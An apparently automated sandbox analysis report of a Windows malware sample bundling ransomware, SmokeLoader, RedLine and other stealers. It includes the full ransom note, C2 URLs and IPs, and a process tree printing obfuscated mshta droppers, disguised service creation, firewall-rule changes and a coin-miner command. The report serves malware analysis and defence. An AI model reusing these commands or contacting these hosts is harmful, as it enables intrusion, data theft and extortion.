Resubmissions
12-07-2021 16:55
210712-cvz622xsbj 1010-07-2021 13:25
210710-pdfh7kft96 1009-07-2021 23:00
210709-hewxkm1xlj 1009-07-2021 16:08
210709-5ql27kyjqa 1009-07-2021 14:08
210709-pt977a4bhe 1008-07-2021 22:09
210708-3ypfnj5j7x 1008-07-2021 13:30
210708-4hsk7y9f2x 1008-07-2021 12:14
210708-8t5f9z9egj 10Analysis
-
max time kernel
1800s -
max time network
1814s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
09-07-2021 23:00
General
-
Target
toolspab2 (17).exe
-
Size
315KB
-
MD5
1d20e1f65938e837ef1b88f10f1bd6c3
-
SHA1
703d7098dbfc476d2181b7fc041cc23e49c368f1
-
SHA256
05cd7440851f13dd8f489bb3c06eba385d85d7d9a77a612049c04c541a88593d
-
SHA512
f9d333abe1f721b8d45d7bc6b5f286af09a8d233bd1d41f0ad891840cf742364aeca2cb6ccd6543f56a8eaf32804f82f72f961d16d5ba663ad706d164915a196
Score
10/10
Malware Config
Extracted
Path
C:\_readme.txt
Ransom Note
ATTENTION!
Don't worry, you can return all your files!
All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.
The only method of recovering files is to purchase decrypt tool and unique key for you.
This software will decrypt all your encrypted files.
What guarantees you have?
You can send one of your encrypted file from your PC and we decrypt it for free.
But we can decrypt only 1 file for free. File must not contain valuable information.
You can get and look video overview decrypt tool:
https://we.tl/t-mNr1oio2P6
Price of private key and decrypt software is $980.
Discount 50% available if you contact us first 72 hours, that's price for you is $490.
Please note that you'll never restore your data without payment.
Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours.
To get this software you need write on our e-mail:
[email protected]
Reserve e-mail address to contact us:
[email protected]
Your personal ID:
0315ewgfDdU7G9lD7dF6jB6enq2GwTgCnebr4rB8NXS3mK2dY6
URLs
https://we.tl/t-mNr1oio2P6
Extracted
Family
smokeloader
Version
2020
C2
http://999080321newfolder1002002131-service1002.space/
http://999080321newfolder1002002231-service1002.space/
http://999080321newfolder3100231-service1002.space/
http://999080321newfolder1002002431-service1002.space/
http://999080321newfolder1002002531-service1002.space/
http://999080321newfolder33417-012425999080321.space/
http://999080321test125831-service10020125999080321.space/
http://999080321test136831-service10020125999080321.space/
http://999080321test147831-service10020125999080321.space/
http://999080321test146831-service10020125999080321.space/
http://999080321test134831-service10020125999080321.space/
http://999080321est213531-service1002012425999080321.ru/
http://999080321yes1t3481-service10020125999080321.ru/
http://999080321test13561-service10020125999080321.su/
http://999080321test14781-service10020125999080321.info/
http://999080321test13461-service10020125999080321.net/
http://999080321test15671-service10020125999080321.tech/
http://999080321test12671-service10020125999080321.online/
http://999080321utest1341-service10020125999080321.ru/
http://999080321uest71-service100201dom25999080321.ru/
rc4.i32
rc4.i32
rc4.i32
rc4.i32
Extracted
Family
redline
Botnet
1
C2
45.32.235.238:45555
Extracted
Family
metasploit
Version
windows/single_exec
Extracted
Family
redline
C2
82.202.161.37:26317
Extracted
Family
redline
Botnet
BtcOnly
C2
185.53.46.82:3214
Signatures
-
Glupteba
Glupteba is a modular loader written in Golang with various components.
-
Glupteba Payload 2 IoCs
-
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 7 IoCs
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
-
Socelars Payload 2 IoCs
-
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
-
Tofsee
Backdoor/botnet which carries out malicious activities based on commands from a C2 server.
-
Vidar
Vidar is an infostealer based on Arkei stealer.
-
Windows security bypass 2 TTPs
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Creates new service(s) 1 TTPs
-
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
-
Executes dropped EXE 64 IoCs
-
Modifies Windows Firewall 1 TTPs
-
Modifies extensions of user files 4 IoCs
Ransomware generally changes the extension on encrypted files.
-
Sets service image path in registry 2 TTPs
-
VMProtect packed file 3 IoCs
Detects executables packed with VMProtect commercial packer.
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Deletes itself 1 IoCs
-
Loads dropped DLL 25 IoCs
-
Modifies file permissions 1 TTPs 1 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses 2FA software files, possible credential harvesting 2 TTPs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 2 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 1 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 12 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Drops file in System32 directory 3 IoCs
-
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
-
Suspicious use of SetThreadContext 18 IoCs
-
Drops file in Program Files directory 29 IoCs
-
Drops file in Windows directory 4 IoCs
-
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 2 IoCs
-
Checks SCSI registry key(s) 3 TTPs 27 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 9 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Delays execution with timeout.exe 2 IoCs
-
Enumerates system info in registry 2 TTPs 2 IoCs
-
Kills process with taskkill 4 IoCs
-
Modifies Internet Explorer settings 1 TTPs 5 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies registry class 64 IoCs
-
Modifies system certificate store 2 TTPs 4 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious behavior: MapViewOfSection 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 1 IoCs
-
Suspicious use of SetWindowsHookEx 15 IoCs
-
Suspicious use of UnmapMainImage 1 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵
- Modifies registry class
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s UserManager1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵
-
C:\Users\Admin\AppData\Roaming\brccrhvC:\Users\Admin\AppData\Roaming\brccrhv2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\brccrhvC:\Users\Admin\AppData\Roaming\brccrhv3⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
-
-
C:\Users\Admin\AppData\Roaming\rtccrhvC:\Users\Admin\AppData\Roaming\rtccrhv2⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
-
C:\Users\Admin\AppData\Local\6b4f61d5-5527-435c-a231-957a5eb3e297\AC74.exeC:\Users\Admin\AppData\Local\6b4f61d5-5527-435c-a231-957a5eb3e297\AC74.exe --Task2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\6b4f61d5-5527-435c-a231-957a5eb3e297\AC74.exeC:\Users\Admin\AppData\Local\6b4f61d5-5527-435c-a231-957a5eb3e297\AC74.exe --Task3⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\AppData\Local\6b4f61d5-5527-435c-a231-957a5eb3e297\AC74.exeC:\Users\Admin\AppData\Local\6b4f61d5-5527-435c-a231-957a5eb3e297\AC74.exe --Task2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\6b4f61d5-5527-435c-a231-957a5eb3e297\AC74.exeC:\Users\Admin\AppData\Local\6b4f61d5-5527-435c-a231-957a5eb3e297\AC74.exe --Task3⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\AppData\Roaming\brccrhvC:\Users\Admin\AppData\Roaming\brccrhv2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\brccrhvC:\Users\Admin\AppData\Roaming\brccrhv3⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
-
-
-
C:\Users\Admin\AppData\Roaming\rtccrhvC:\Users\Admin\AppData\Roaming\rtccrhv2⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
-
-
C:\Users\Admin\AppData\Local\6b4f61d5-5527-435c-a231-957a5eb3e297\AC74.exeC:\Users\Admin\AppData\Local\6b4f61d5-5527-435c-a231-957a5eb3e297\AC74.exe --Task2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\6b4f61d5-5527-435c-a231-957a5eb3e297\AC74.exeC:\Users\Admin\AppData\Local\6b4f61d5-5527-435c-a231-957a5eb3e297\AC74.exe --Task3⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\AppData\Local\6b4f61d5-5527-435c-a231-957a5eb3e297\AC74.exeC:\Users\Admin\AppData\Local\6b4f61d5-5527-435c-a231-957a5eb3e297\AC74.exe --Task2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\6b4f61d5-5527-435c-a231-957a5eb3e297\AC74.exeC:\Users\Admin\AppData\Local\6b4f61d5-5527-435c-a231-957a5eb3e297\AC74.exe --Task3⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\AppData\Roaming\brccrhvC:\Users\Admin\AppData\Roaming\brccrhv2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\brccrhvC:\Users\Admin\AppData\Roaming\brccrhv3⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
-
-
-
C:\Users\Admin\AppData\Roaming\rtccrhvC:\Users\Admin\AppData\Roaming\rtccrhv2⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
-
-
C:\Users\Admin\AppData\Local\6b4f61d5-5527-435c-a231-957a5eb3e297\AC74.exeC:\Users\Admin\AppData\Local\6b4f61d5-5527-435c-a231-957a5eb3e297\AC74.exe --Task2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\6b4f61d5-5527-435c-a231-957a5eb3e297\AC74.exeC:\Users\Admin\AppData\Local\6b4f61d5-5527-435c-a231-957a5eb3e297\AC74.exe --Task3⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\AppData\Local\6b4f61d5-5527-435c-a231-957a5eb3e297\AC74.exeC:\Users\Admin\AppData\Local\6b4f61d5-5527-435c-a231-957a5eb3e297\AC74.exe --Task2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\6b4f61d5-5527-435c-a231-957a5eb3e297\AC74.exeC:\Users\Admin\AppData\Local\6b4f61d5-5527-435c-a231-957a5eb3e297\AC74.exe --Task3⤵
- Executes dropped EXE
-
-
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s gpsvc1⤵
-
C:\Users\Admin\AppData\Local\Temp\toolspab2 (17).exe"C:\Users\Admin\AppData\Local\Temp\toolspab2 (17).exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\toolspab2 (17).exe"C:\Users\Admin\AppData\Local\Temp\toolspab2 (17).exe"2⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s BITS1⤵
- Suspicious use of SetThreadContext
- Modifies registry class
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵
- Drops file in System32 directory
- Checks processor information in registry
- Modifies data under HKEY_USERS
-
-
C:\Users\Admin\AppData\Local\Temp\3A0C.exeC:\Users\Admin\AppData\Local\Temp\3A0C.exe1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\3B74.exeC:\Users\Admin\AppData\Local\Temp\3B74.exe1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\3E54.exeC:\Users\Admin\AppData\Local\Temp\3E54.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\3E54.exeC:\Users\Admin\AppData\Local\Temp\3E54.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\41A1.exeC:\Users\Admin\AppData\Local\Temp\41A1.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\4403.exeC:\Users\Admin\AppData\Local\Temp\4403.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\47FC.exeC:\Users\Admin\AppData\Local\Temp\47FC.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\4E46.exeC:\Users\Admin\AppData\Local\Temp\4E46.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\AC74.exeC:\Users\Admin\AppData\Local\Temp\AC74.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\AC74.exeC:\Users\Admin\AppData\Local\Temp\AC74.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
- Modifies system certificate store
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\6b4f61d5-5527-435c-a231-957a5eb3e297" /deny *S-1-1-0:(OI)(CI)(DE,DC)3⤵
- Modifies file permissions
-
-
C:\Users\Admin\AppData\Local\Temp\AC74.exe"C:\Users\Admin\AppData\Local\Temp\AC74.exe" --Admin IsNotAutoStart IsNotTask3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\AC74.exe"C:\Users\Admin\AppData\Local\Temp\AC74.exe" --Admin IsNotAutoStart IsNotTask4⤵
- Executes dropped EXE
- Modifies extensions of user files
-
C:\Users\Admin\AppData\Local\2b7d8c72-01f5-43ea-ba00-b12fb1e0814f\build2.exe"C:\Users\Admin\AppData\Local\2b7d8c72-01f5-43ea-ba00-b12fb1e0814f\build2.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\2b7d8c72-01f5-43ea-ba00-b12fb1e0814f\build2.exe"C:\Users\Admin\AppData\Local\2b7d8c72-01f5-43ea-ba00-b12fb1e0814f\build2.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\2b7d8c72-01f5-43ea-ba00-b12fb1e0814f\build2.exe" & del C:\ProgramData\*.dll & exit7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im build2.exe /f8⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 68⤵
- Delays execution with timeout.exe
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\B61A.exeC:\Users\Admin\AppData\Local\Temp\B61A.exe1⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\BA22.exeC:\Users\Admin\AppData\Local\Temp\BA22.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-E7SEV.tmp\BA22.tmp"C:\Users\Admin\AppData\Local\Temp\is-E7SEV.tmp\BA22.tmp" /SL5="$600EE,506127,422400,C:\Users\Admin\AppData\Local\Temp\BA22.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-K898I.tmp\1075474_ah_hot_iconçè_)))_.exe"C:\Users\Admin\AppData\Local\Temp\is-K898I.tmp\1075474_ah_hot_iconçè_)))_.exe" /S /UID=rec73⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files\Windows Security\IFQKGKJORZ\irecord.exe"C:\Program Files\Windows Security\IFQKGKJORZ\irecord.exe" /VERYSILENT4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-15T5K.tmp\irecord.tmp"C:\Users\Admin\AppData\Local\Temp\is-15T5K.tmp\irecord.tmp" /SL5="$40120,5808768,66560,C:\Program Files\Windows Security\IFQKGKJORZ\irecord.exe" /VERYSILENT5⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\i-record\I-Record.exe"C:\Program Files (x86)\i-record\I-Record.exe" -silent -desktopShortcut -programMenu6⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\06-706f0-6ca-26cb7-dfe767cbfcd1d\Cokitakaera.exe"C:\Users\Admin\AppData\Local\Temp\06-706f0-6ca-26cb7-dfe767cbfcd1d\Cokitakaera.exe"4⤵
- Executes dropped EXE
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bj0ux10w.454\GcleanerEU.exe /eufive & exit5⤵
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ddqhf40a.043\installer.exe /qn CAMPAIGN="654" & exit5⤵
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\j0kcsutu.2af\ufgaa.exe & exit5⤵
-
C:\Users\Admin\AppData\Local\Temp\j0kcsutu.2af\ufgaa.exeC:\Users\Admin\AppData\Local\Temp\j0kcsutu.2af\ufgaa.exe6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt7⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt7⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt7⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt7⤵
- Executes dropped EXE
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xipicvns.jft\google-game.exe & exit5⤵
-
C:\Users\Admin\AppData\Local\Temp\xipicvns.jft\google-game.exeC:\Users\Admin\AppData\Local\Temp\xipicvns.jft\google-game.exe6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\xipicvns.jft\google-game.exe"C:\Users\Admin\AppData\Local\Temp\xipicvns.jft\google-game.exe" -a7⤵
- Executes dropped EXE
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\r4zgpkz2.s3f\GcleanerWW.exe /mixone & exit5⤵
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tqarn5mq.hrl\toolspab1.exe & exit5⤵
-
C:\Users\Admin\AppData\Local\Temp\tqarn5mq.hrl\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\tqarn5mq.hrl\toolspab1.exe6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\tqarn5mq.hrl\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\tqarn5mq.hrl\toolspab1.exe7⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\e4-6418f-63a-c3c99-459fdc448676d\ZHubykoduhae.exe"C:\Users\Admin\AppData\Local\Temp\e4-6418f-63a-c3c99-459fdc448676d\ZHubykoduhae.exe"4⤵
- Executes dropped EXE
- Checks computer location settings
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\C658.exeC:\Users\Admin\AppData\Local\Temp\C658.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\C658.exe"C:\Users\Admin\AppData\Local\Temp\C658.exe"2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
-
C:\Users\Admin\AppData\Local\Temp\CAAF.exeC:\Users\Admin\AppData\Local\Temp\CAAF.exe1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\rccdkxbl\2⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\smuyizaj.exe" C:\Windows\SysWOW64\rccdkxbl\2⤵
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" create rccdkxbl binPath= "C:\Windows\SysWOW64\rccdkxbl\smuyizaj.exe /d\"C:\Users\Admin\AppData\Local\Temp\CAAF.exe\"" type= own start= auto DisplayName= "wifi support"2⤵
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" description rccdkxbl "wifi internet conection"2⤵
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" start rccdkxbl2⤵
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\D3A9.exeC:\Users\Admin\AppData\Local\Temp\D3A9.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe3⤵
- Kills process with taskkill
-
-
-
C:\Users\Admin\AppData\Local\Temp\DDDB.exeC:\Users\Admin\AppData\Local\Temp\DDDB.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\E31C.exeC:\Users\Admin\AppData\Local\Temp\E31C.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\EC83.exeC:\Users\Admin\AppData\Local\Temp\EC83.exe1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\rccdkxbl\smuyizaj.exeC:\Windows\SysWOW64\rccdkxbl\smuyizaj.exe /d"C:\Users\Admin\AppData\Local\Temp\CAAF.exe"1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\SysWOW64\svchost.exesvchost.exe2⤵
- Drops file in System32 directory
- Suspicious use of SetThreadContext
-
C:\Windows\SysWOW64\svchost.exesvchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half3⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\FE95.exeC:\Users\Admin\AppData\Local\Temp\FE95.exe1⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbsCript: clOSE ( CrEAteOBJect ("WscRIPt.ShELL" ). rUN ( "CMd.EXE /q /c Copy /Y ""C:\Users\Admin\AppData\Local\Temp\FE95.exe"" ..\IpDIhVj3g.ExE && STARt ..\IpDIhVj3g.EXe /PyPXDDGMMiEeTQRVIP2SQdwWi2M& IF """"=="""" for %s IN ( ""C:\Users\Admin\AppData\Local\Temp\FE95.exe"") do taskkill -f /Im ""%~nxs"" " , 0 , truE ) )2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /c Copy /Y "C:\Users\Admin\AppData\Local\Temp\FE95.exe" ..\IpDIhVj3g.ExE && STARt ..\IpDIhVj3g.EXe /PyPXDDGMMiEeTQRVIP2SQdwWi2M& IF ""=="" for %s IN ( "C:\Users\Admin\AppData\Local\Temp\FE95.exe") do taskkill -f /Im "%~nxs"3⤵
-
C:\Users\Admin\AppData\Local\Temp\IpDIhVj3g.ExE..\IpDIhVj3g.EXe /PyPXDDGMMiEeTQRVIP2SQdwWi2M4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbsCript: clOSE ( CrEAteOBJect ("WscRIPt.ShELL" ). rUN ( "CMd.EXE /q /c Copy /Y ""C:\Users\Admin\AppData\Local\Temp\IpDIhVj3g.ExE"" ..\IpDIhVj3g.ExE && STARt ..\IpDIhVj3g.EXe /PyPXDDGMMiEeTQRVIP2SQdwWi2M& IF ""/PyPXDDGMMiEeTQRVIP2SQdwWi2M""=="""" for %s IN ( ""C:\Users\Admin\AppData\Local\Temp\IpDIhVj3g.ExE"") do taskkill -f /Im ""%~nxs"" " , 0 , truE ) )5⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /c Copy /Y "C:\Users\Admin\AppData\Local\Temp\IpDIhVj3g.ExE" ..\IpDIhVj3g.ExE && STARt ..\IpDIhVj3g.EXe /PyPXDDGMMiEeTQRVIP2SQdwWi2M& IF "/PyPXDDGMMiEeTQRVIP2SQdwWi2M"=="" for %s IN ( "C:\Users\Admin\AppData\Local\Temp\IpDIhVj3g.ExE") do taskkill -f /Im "%~nxs"6⤵
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBSCrIpT: cLose ( CreAteObject( "wSCrIPt.ShelL" ). RUN ( "cMd /Q /C ecHo 6C:\Users\Admin\AppData\Local\TempZwG> QEFuCrB.w &ECHO | SeT /p = ""MZ"" > 0CZKPbA.~i © /Y /b 0CZKPBA.~i +HzMuGQn.ebg + 3KLPjZ48.1 + JBBP.aZ +jjD1CZ.Z +ME53U.RD + G8HVV~AW.A + QEFuCRB.w ..\LPHzR4.XZ &sTaRt regsvr32.exe ..\LphZr4.XZ /U -S & dEl /Q * " ,0 , tRuE ) )5⤵
-
